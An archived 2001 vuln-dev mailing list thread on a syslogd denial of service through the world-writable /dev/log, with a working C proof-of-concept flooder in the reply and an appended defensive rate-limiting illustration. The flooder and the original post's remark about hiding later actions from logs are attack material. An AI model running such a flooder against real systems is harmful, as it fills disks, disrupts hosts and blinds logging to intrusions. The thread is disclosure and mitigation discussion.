Vulnerability Development mailing list archives
Re: Possible syslogd DoS ?
From: "VeNoMouS" <venom () phreaker net>
Date: Thu, 4 Oct 2001 18:37:20 +1200
Well, that wouldn't work too well, as syslog likes to do "message repeating X number of times", so trying to fill it up would prove boring and pointless. But yeah, you could do it simple like this:

    #include <stdio.h>
    #include <syslog.h>

    main()
    {
        FILE *fp;
        char buffer[1024];

        printf("Starting Dos..\n");
        if((fp=fopen("/dev/urandom","r"))==NULL)
        {
            printf("Error Opening /dev/urandom\n");
            exit(0);
        }
        for(;;)
        {
            fgets(buffer,sizeof(buffer),fp);
            buffer[strlen(buffer)-1]='\0';
            syslog(0,buffer,strlen(buffer));
        }
    }

Something as simple as that works, but for some reason when I run it on my box it seems to exit after a while even though I capture all signals. Maybe syslog() has an exit() in the function; I can't be bothered looking into it. I did this code on the fly for proof of concept.

----- Original Message -----
From: Petr Baudis <pasky () pasky ji cz>
To: <vuln-dev () securityfocus com>
Sent: Thursday, October 04, 2001 6:09 AM
Subject: Possible syslogd DoS ?
Hello,

I just recently came on a thought (thanks to Marek Jaros) of possible DoS of syslogd. It uses /dev/log for receiving log messages, which has mode 0666 on most linuxes. It should be ok, as many non-root applications should be allowed to log things etc. But imagine that you will send a lot of very long messages there, different every time in order not to get stripped into kinda 'message repeated x times'. In this way, you can imho flood syslogd successfully, possibly filling the whole partition where /var/log resides, regardless of your quota settings on the machine! Then, if /var/log is not on a separate partition, the whole system can get into serious problems, and especially, further events obviously won't be logged, so you can do evil things there happily and nobody will know about it.

Discussion? Something I didn't take into account? Possible solutions?

--
Petr "Pasky" Baudis
.
n = ((n >> 1) & 0x55555555) | ((n << 1) & 0xaaaaaaaa);
n = ((n >> 2) & 0x33333333) | ((n << 2) & 0xcccccccc);
n = ((n >> 4) & 0x0f0f0f0f) | ((n << 4) & 0xf0f0f0f0);
n = ((n >> 8) & 0x00ff00ff) | ((n << 8) & 0xff00ff00);
n = ((n >> 16) & 0x0000ffff) | ((n << 16) & 0xffff0000);
-- C code which reverses the bits in a word.
.
My public PGP key is on: http://pasky.ji.cz/~pasky/pubkey.txt
-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS d- s++:++ a--- C+++ UL++++$ P+ L+++ E--- W+ N !o K- w-- !O M- !V PS+ !PE Y+ PGP+>++ t+ 5 X(+) R++ tv- b+ DI(+) D+ G e-> h! r% y?
------END GEEK CODE BLOCK------
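
Added example, not written by either poster: both messages turn on the fact that repeat compression folds only identical lines, so this C model compares it with a per-sender interval/burst limit as one possible answer to the "Possible solutions?" question. The limits, the function names and the idea of telling senders apart by pid are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>
/* Added illustration: all names and limits here are hypothetical. */
#define BURST 5        /* lines accepted per sender per window */
#define INTERVAL 10    /* window length in seconds */
#define MAX_SENDERS 16
struct sender { int pid; long window_start; int count; };
static struct sender tab[MAX_SENDERS];
static int nsenders;

/* Repeat compression: only an exact copy of the previous line is folded. */
int is_repeat(const char *prev, const char *msg) {
    return prev[0] != '\0' && strcmp(prev, msg) == 0;
}

/* Per-sender limiter: 1 = write the line, 0 = drop it. Assumes the daemon
 * can tell senders apart by pid (an assumption, e.g. socket credentials). */
int rate_accept(int pid, long now) {
    struct sender *s = NULL;
    for (int i = 0; i < nsenders; i++)
        if (tab[i].pid == pid) s = &tab[i];
    if (s == NULL) {
        if (nsenders == MAX_SENDERS) return 0;  /* table full: drop */
        s = &tab[nsenders++];
        s->pid = pid; s->window_start = now; s->count = 0;
    }
    if (now - s->window_start >= INTERVAL) { s->window_start = now; s->count = 0; }
    if (s->count >= BURST) return 0;
    s->count++;
    return 1;
}

/* Feed n constructed, all-different lines from one pid; count lines written. */
int lines_written(int pid, int n, long now, int use_limiter) {
    char prev[64] = "", msg[64];
    int written = 0;
    for (int i = 0; i < n; i++) {
        snprintf(msg, sizeof msg, "constructed message %d", i);
        if (is_repeat(prev, msg)) continue;  /* never true: every line differs */
        strcpy(prev, msg);
        if (use_limiter && !rate_accept(pid, now)) continue;
        written++;
    }
    return written;
}

int main(void) {
    printf("repeat compression only: %d/1000\n", lines_written(100, 1000, 0, 0));
    printf("per-sender rate limit:   %d/1000\n", lines_written(100, 1000, 0, 1));
    return 0;
}
```

With the limiter on, a second sender logging at a normal rate is unaffected, and the noisy sender is accepted again once its window expires.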